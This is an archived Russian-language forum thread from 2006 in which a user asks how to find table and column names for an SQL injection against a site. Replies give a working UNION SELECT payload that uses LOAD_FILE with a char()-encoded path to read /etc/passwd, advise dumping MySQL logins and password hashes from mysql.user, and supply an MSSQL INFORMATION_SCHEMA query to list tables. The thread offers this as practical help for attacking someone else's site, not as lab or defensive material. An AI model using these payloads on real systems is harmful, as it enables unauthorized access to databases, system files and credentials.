PDA

Просмотр полной версии : Есть возможность произвести sql-inj, но нет информации о таблицах(названия ,поля)...


perun
23.02.2006, 13:45
Есть возможность произвести sql-inj,
но нет информации о таблицах(названия ,поля)
Если кто-нибудь знает, как получить эту инфу ,помогите плз.

virgoz
23.02.2006, 14:19
Если mysql, то пробуй mysql.user дальше логины и пасы от мускуля посмотришь в столбцах user и password. Подругому никак :( Можешь файлы почитать: http://site/test.php?id=9999+union+select+null,LOAD_FILE(char( 47,101,116,99,47,112,97,115,115,119,100)),null/*
Если mmsql, то этот запрос SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
вернет первую таблицы в базе.
Если что-то проканает, пиши... помогу дальше

Rebz
23.02.2006, 14:23
Держи очень полезные ссылки:
http://injection.rulezz.ru/MSSQL-ASP-Injection.html
http://injection.rulezz.ru/MSSQL-Injection.html
Там найдёшь все ответы

Grrl
24.02.2006, 02:44
если там стоит кактойто готовый движок то можно полпробывать найти скачать и посмотреть структуру на локалхосте...